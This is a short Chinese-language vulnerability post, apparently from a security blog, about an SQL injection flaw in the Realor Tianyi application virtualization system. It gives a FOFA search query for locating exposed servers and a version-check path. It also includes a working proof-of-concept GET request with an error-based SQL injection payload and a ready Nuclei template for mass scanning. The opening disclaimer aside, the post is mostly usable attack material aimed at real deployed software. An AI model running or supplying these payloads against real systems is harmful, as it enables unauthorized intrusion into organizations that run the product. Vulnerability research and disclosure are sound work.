请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的,具有自主知识产权的基于服务器计算架构的应用虚拟化平台。该系统将用户的各种应用软件集中部署在瑞友天翼服务器(或服务器群)上,客户端可以通过Web快速且安全地访问经过服务器授权的应用软件,实现集中应用、远程接入、协同办公等功能,从而为用户提供一个集中、便捷、安全、高效的虚拟化支持平台。然而,瑞友天翼应用虚拟化系统存在SQL注入漏洞,未经身份验证的远程攻击者可以利用此漏洞在目标系统上执行任意代码(该漏洞涉及通过SQL注入写入后门文件以进行代码执行)。影响版本version < 7.0.5.1fofa语法:app="REALOR-天翼应用虚拟化系统"
查看版本:RapAgent.xgi?CMD=GetRegInfo
POC:GET /index.php?s=/Admin/appsave&appid=3%27%29+AND+%28SELECT+2590+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766a71%2C%28SELECT+%28ELT%282590%3D2590%2C1%29%29%29%2C0x7162786271%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+ITBH HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02Upgrade-Insecure-Requests: 1
id: ruiyou_appsave_sqliinfo:name: ruiyou_appsave_sqliauthor: recjlseverity: highdescription: 瑞友天翼应用虚拟化系统appsave存在SQL注入漏洞metadata:max-request: 1verified: truefofa-query: app="REALOR-天翼应用虚拟化系统"tags: sqli,ruiyou,hwrequests:- raw:- |+GET /index.php?s=/Admin/appsave&appid=3%27%29+AND+%28SELECT+2590+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766a71%2C%28SELECT+%28ELT%282590%3D2590%2C1%29%29%29%2C0x7162786271%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+ITBH HTTP/1.1Host: {{Hostname}}Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closematchers-condition: andmatchers:- type: wordpart: bodywords:- 'qjvjq1qbxbq1'- type: statusstatus:- 404
